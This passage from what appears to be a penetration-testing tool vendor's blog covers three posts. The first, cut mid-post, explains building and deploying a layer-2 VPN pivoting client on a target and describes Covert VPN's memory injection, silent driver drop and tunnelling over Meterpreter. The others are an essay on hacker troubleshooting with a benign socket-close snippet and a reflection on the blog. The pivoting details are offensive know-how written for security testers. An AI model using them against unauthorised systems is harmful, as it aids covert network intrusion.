Once the layer-2 client connects to the layer-2 server, use a DHCP client to request an IP address on your attack server’s network interface [or configure an IP address with ifconfig].

Build Instructions

I’ve made the source code for this simple Layer-2 client available under a BSD license. You will need to download the Windows PCAP Developer Pack and extract it to the folder where the layer-2 client lives. You can build the layer-2 client on Kali Linux with the included Minimal GNU for Windows Cross Compiler. Just type ‘make’ in its folder.

Deployment

To try this Layer-2 client, you will need to install WinPcap on your target system. You can download WinPcap from Riverbed Technology. And, that’s it. I hope you’ve enjoyed this deep dive into VPN pivoting and how it works.

The layer-2 client is a stripped down version of Cobalt Strike’s Covert VPN feature. Covert VPN compiles as a reflective DLL. This allows Cobalt Strike to inject it into memory. The Covert VPN client and server encrypt the VPN traffic [hence, VPN pivoting]. Covert VPN will also silently drop a minimal WinPcap install and clean it up for you. And, Covert VPN supports multiple data channels. It’ll tunnel frames over TCP, UDP, HTTP, or through Meterpreter.

The #1 Trait of a Successful Hacker

May 8, 2014

For some people, programming comes naturally. For others, it’s a struggle or something that doesn’t click with the way they think. The same is true of hacking.

Hackers often complain about “script kiddies”, people who use tools without any clue about what they do. What’s the difference between someone who will become a good hacker and someone who will stay a script kiddie forever?

I know the answer. Here it is. The number one trait for a successful hacker is the ability to reason about things one can’t directly observe.

Since a hacker is in the business of circumventing controls or discovering the unknown, they’re constantly in the blind. They have to reason about what they’re trying to hack though. If they can’t, they’ll never figure out the system they’re working on.

This innate ability to reason comes from a solid mental model. A mental model is your ability to quickly ask a question and have several guesses at an answer. When someone asks me a question, sometimes I have a few ideas. Other times I’m stuck. I’m stuck when I have no reference for the situation as described to me. Sometimes, I’m stuck because there are too many possibilities and I don’t have enough information to pick one. This is how I feel with 99% of the Armitage “support requests” I get.

Where does a mental model come from? A mental model comes from knowing how something works. Reading, attending classes, and otherwise consuming information provide some of the pieces of a mental model, but passive learning, by itself, will not build a mental model for you. To create a mental model, you have to do something active with these pieces. This active piece requires envisioning an outcome or goal, attempting it, failing, figuring out why, and going on to eventually succeed with the task. There’s an emotion that goes with this active learning process. It’s called frustration.

If you’re frustrated at different times while you’re learning or doing, but you still get the job done, then congratulations–you’re building your mental model.

When I was working on the browser pivoting feature for Cobalt Strike, I had the benefit of an unexpected learning experience. My proxy server would process a request, send a response, and close the socket. In local testing, this worked perfectly. When I used a port forward through Meterpreter, it would work most of the time. When I tried to browser pivot with Meterpreter tunneled through Cobalt Strike’s Beacon connected to Amazon’s EC2, requests failed 90% of the time.

What happened? Why was it failing? I could have thrown up my hands and said “it doesn’t work” or “this lousy performance is acceptable”. I went through each component of my system and tried to understand it. Eventually, I figured out that my call to closesocket would make a best effort to finish sending data in the socket’s outbound queue. Usually, this worked fine. As I introduced latency into my pivoting process, I increased the opportunity for data to get discarded. Before I released this feature, I was able to solve this problem.
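For reference, the general pattern for this class of problem on Windows is a graceful shutdown: stop sending, let the peer finish reading, and only then close the socket. This is a sketch of the idea, not the exact code in Cobalt Strike.

#include <winsock2.h>

/* sketch of a graceful close: tell the peer we're done sending, drain
   anything left on the connection, then close. queued outbound data gets
   a chance to be delivered even over a high-latency path. */
void graceful_close(SOCKET s) {
	char discard[4096];

	shutdown(s, SD_SEND);                         /* FIN goes out after queued data */
	while (recv(s, discard, sizeof(discard), 0) > 0)
		;                                         /* wait for the peer to close its side */
	closesocket(s);
}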

This frustrating experience improved my mental model. I couldn’t just look at my code to solve the problem. I had to setup experiments and reason about parts of the system I didn’t write or have full knowledge of.

If you want to succeed as a hacker, learn to troubleshoot. Learn how the things around you work. If you can’t directly observe a detail, learn how to get the answer another way. If you run out of ideas, keep digging. The answer is out there.

Meat and Potatoes

April 17, 2014

I’m well over 100 posts into this blog now. Wow! I’ve had several blogs in the past, but this is one of the few I’ve had a consistent run with. The other was the After the Deadline blog, which gets fewer updates since I left the project.

After 100 posts, I feel it’s time to capture what this blog is about and what I hope it says to you. It’s probably no surprise, but this is the “official” blog for Strategic Cyber LLC, which is my company and my full-time occupation. I get asked “what else do you do?” a lot. I want to make it crystal clear that this business has and has had my full-time focus for the past two and a half years.

I try to blog once each week; that’s my goal. Sometimes, I feel like writing and I draft several posts at once. It takes a while to make a post suitable to publish. Right now, I have hundreds of posts in various draft states. Each week, I try to find the one that is close to publishable and I fix it up.

I blog each week because this is my signal to you that I’m alive. When I evaluate a company, I look at two things. I look at the footer of their website to see the copyright date. I then look at their blog. If the copyright date says 2007 or if their blog is dead, I assume that the company is dead. I don’t want to be that company, so I pay attention to these two things. The rest is gravy.

I write a lot of posts about basic penetration testing and Metasploit Framework stuff. Someone on Reddit once commented that some of my posts have a lot of insight, but others are hacking 101. There’s a reason for this…

It’s probably no surprise, but I don’t know everything about hacking or how different hacking techniques work. I’ve met many who claim they do. I’m not as good as these amazing geniuses among us. I’m learning every day. I watch presentations, I read source code, and I conduct experiments. Cobalt Strike is a great driver of this, as most features I implement require me to learn something new. It’s a lot of fun.

Several of my blog posts capture the essence of something I learned. My popular Bypass UAC blog post summarizes what I learned implementing this feature into Cobalt Strike’s Beacon. I didn’t understand this attack and the left and right bounds of it before this work. I reckoned that if the material was new to me, it’s probably new to someone else too. So, I took the time to write about it.

My recent post on getsystem falls along the same lines. I knew how to type getsystem. I understand what SYSTEM is. I didn’t understand what happened when I typed the command. I was surprised by what I found out. I wrote a blog post on it.

Other blog posts come from customer questions. Semi-regularly, I would get exasperated support requests from someone who had trouble sending a phish to their Gmail account. I tired of trying to rapid-fire explain email delivery on a case-by-case basis. I wrote a blog post about Email Delivery and spent a lot of time on issues that affect penetration testers. Writing this post wasn’t a simple matter of transferring my knowledge into the written word. I had to verify everything I wrote. During this process, I found that my understanding of some topics was off (e.g., my working knowledge of SPF was way off).

This verification is another reason I write and I teach. Both of these things keep me honest. Publishing code and writing are two ways to feel very naked. I know that if I misstate something or mislead someone, I will get called out. This is pretty intimidating. That said, if I can’t handle that intimidation, I probably have no business developing tools that other experts use to do an important job. So, I take it in stride.

Some blog posts summarize my experiences. I care a lot about operations. I like to reflect on how people work, how things work, and how tools can work together and complement each other. When it’s appropriate to do so, I use this blog as a place to share my experiences about how I use my tools, how others use them, and different ways to organize a team. I think it’s important for tool developers to ground themselves in the reality of how people use and react to their tools. I spend a lot of time using my tools with other professionals to keep myself grounded.

My regular use of Cobalt Strike is what gives me so much confidence in this toolset. I see it do amazing things all of the time. Some days, I can’t believe I’m the one who works on it.

In terms of audience, I primarily write for the people who already read this blog. I used to have a keen interest in attracting attention for each post. I’d measure a post’s success by how many views it received in its first day. This pressure took some of the fun away from writing and it restricted me from writing what interested me. I won’t say I have more readers since this change—I don’t. But, freeing myself from this metric allows me to write with more candor. That’s how this blog ends up with posts like this one. It satisfies my weekly goal, allows me to say something I wanted to share, and do so in a way that’s free from any expectations.

So, what’s this blog about? It’s a signal that I’m alive and working on your behalf. It’s also an opportunity to share what I’m learning as I go.
